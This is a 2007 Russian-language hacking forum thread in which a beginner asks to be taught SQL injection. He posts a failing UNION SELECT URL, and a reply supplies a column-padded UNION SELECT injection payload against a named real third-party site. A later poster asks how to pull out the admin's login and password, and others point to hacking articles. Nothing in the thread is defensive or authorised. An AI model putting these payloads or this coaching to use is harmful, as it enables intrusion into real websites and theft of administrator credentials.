Научите делать sql injection
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Научите делать sql injection - 2007-08-20 15:02:29.213333
|
|
|
hlopchik3000
Сообщений: 2
Оценки: 0
Присоединился: 2007-08-12 18:43:18.986666
|
Вот решил попробовать сделать иньекцию на сате!
site.ru/main.php?ttt=-1+union+select+1,2,3,4,5,6,7,8,9/*
Я подбирал поля но так и нечего не подобрал! Что я делаю не правильно?
Выдаёт мне такое:
quote:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/site.ru/WWW/search.inc on line 143
по вашему запросу ничего не выбран
|
|
|
|
|
RE: Научите делать sql injection - 2007-08-21 20:56:01.703333
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
значит мало подбирал. в чем вообще проблема? какой смысл создавать тему в стиле "хочу все и сразу, ничего не знаю, ничего не умею, но научите."
уже тошно, правда.
а еще глупо заменять реальное название сайта на site.ru, ибо если хочешь помощи - давай ссылку на конкретную багу, тогда может и помогут.
http://films.h16.ru/main.php?ttt=-15%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
|
|
|
|
|
RE: Научите делать sql injection - 2007-08-21 21:09:45.683333
|
|
|
CtRl
Сообщений: 75
Оценки: 0
Присоединился: 2007-08-20 01:01:22.340000
|
Если у тебя есть возможность (в сети или у кого-нибудь), то достань Хакер_Спец номер 03(52) март 2005, он как раз про БД, там есть статья про SQL injection
|
|
|
|
|
RE: Научите делать sql injection - 2007-08-22 19:35:45.696666
|
|
|
Dimonelite
Сообщений: 348
Оценки: 0
Присоединился: 2005-12-05 20:55:07
|
Статей про SQL injection полно. Чем же эта лучше остальных? Вот, например, на июльском диске этого года выложены материалы по теме.
|
|
|
|
|
RE: Научите делать sql injection - 2007-08-22 20:11:43.170000
|
|
|
Tusovshik
Сообщений: 225
Оценки: 0
Присоединился: 2007-07-18 18:34:31.596666
|
quote:
ORIGINAL: Dimonelite
значит мало подбирал. в чем вообще проблема? какой смысл создавать тему в стиле "хочу все и сразу, ничего не знаю, ничего не умею, но научите."
уже тошно, правда.
а еще глупо заменять реальное название сайта на site.ru, ибо если хочешь помощи - давай ссылку на конкретную багу, тогда может и помогут.
http://films.h16.ru/main.php?ttt=-15%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
А что далше делать после того как подобрал поле… Как вытащит логин и пароль админа…???
|
|
|
|
|
RE: Научите делать sql injection - 2007-08-22 21:17:49.813333
|
|
|
CtRl
Сообщений: 75
Оценки: 0
Присоединился: 2007-08-20 01:01:22.340000
|
Почитай вот эту статью, возможно чем-нибудь поможет: http://www.hackzone.ru/articles/view/id/341/
|
|
|
|
|
RE: Научите делать sql injection - 2007-08-22 21:25:19.110000
|
|
|
Tusovshik
Сообщений: 225
Оценки: 0
Присоединился: 2007-07-18 18:34:31.596666
|
quote:
ORIGINAL: CtRl
Почитай вот эту статью, возможно чем-нибудь поможет: http://www.hackzone.ru/articles/view/id/341/
Спасибо… Хоть один с пониманием относится :)
|
|
|
|
|
|
